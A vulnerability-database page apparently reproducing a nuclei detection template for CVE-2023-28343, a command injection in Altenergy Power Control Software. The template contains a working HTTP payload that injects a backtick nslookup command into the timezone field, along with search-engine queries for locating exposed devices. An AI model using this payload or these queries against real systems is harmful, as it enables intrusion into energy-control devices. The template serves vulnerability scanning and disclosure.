Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Altenergy Power Control Software C1.2.5 - Remote Command Injection

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 29 Views

Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter. Successful exploitation allows remote attackers to execute arbitrary commands on the target system

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today		Altenergy Power Control Software C1.2.5 - OS command injection
7 Apr 202300:00
zdt
BDU FSTEC		The vulnerability in the Altenergy Power Control software’s models/management_model.php script allows a perpetrator to elevate their privileges and execute arbitrary commands.
17 Apr 202300:00
bdu_fstec
Circl		CVE-2023-28343
14 Mar 202323:23
circl
CNNVD		Altenergy Power System Control Software 操作系统命令注入漏洞
14 Mar 202300:00
cnnvd
CVE		CVE-2023-28343
14 Mar 202300:00
cve
Cvelist		CVE-2023-28343
14 Mar 202300:00
cvelist
GithubExploit		Exploit for OS Command Injection in Apsystems Energy_Communication_Unit_Firmware
23 Mar 202315:19
githubexploit
Exploit DB		Altenergy Power Control Software C1.2.5 - OS command injection
8 Apr 202300:00
exploitdb
ICS		APSystems Altenergy Power Control
1 Aug 202306:00
ics
NVD		CVE-2023-28343
14 Mar 202320:15
nvd
Rows per page
id: CVE-2023-28343

info:
  name: Altenergy Power Control Software C1.2.5 - Remote Command Injection
  author: pikpikcu
  severity: critical
  description: |
    Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability.
  reference:
    - https://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
    - https://apsystems.com
    - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-28343
    - https://github.com/hba343434/CVE-2023-28343
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-28343
    cwe-id: CWE-78
    epss-score: 0.85332
    epss-percentile: 0.99687
    cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apsystems
    product: energy_communication_unit_firmware
    shodan-query:
      - title:"Altenergy Power Control Software"
      - http.title:"altenergy power control software"
    fofa-query: title="altenergy power control software"
    google-query:
      - intitle:"Altenergy Power Control Software"
      - intitle:"altenergy power control software"
  tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems,vkev,vuln

http:
  - raw:
      - |
        POST /index.php/management/set_timezone HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip, deflate
        Referer: {{RootURL}}/index.php/management/datetime

        timezone=`nslookup {{interactsh-url}}`

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "Time Zone updated successfully"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eea819d86f8c9b3d31d731dd8e2468c1104f0e2a8618c4af0531ba773f0d43af022100a1a6da24e623e2f3e4020ff90a39535b1185947b1ef14a06860df7df0556f409:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
8.6High risk
Vulners AI Score8.6
CVSS 3.19.8
EPSS0.85332
SSVC
altenergy power controlremote command injectionvulnerabilitysecurity patchcve-2023-28343cwe-78iotpacketstormapsystems
29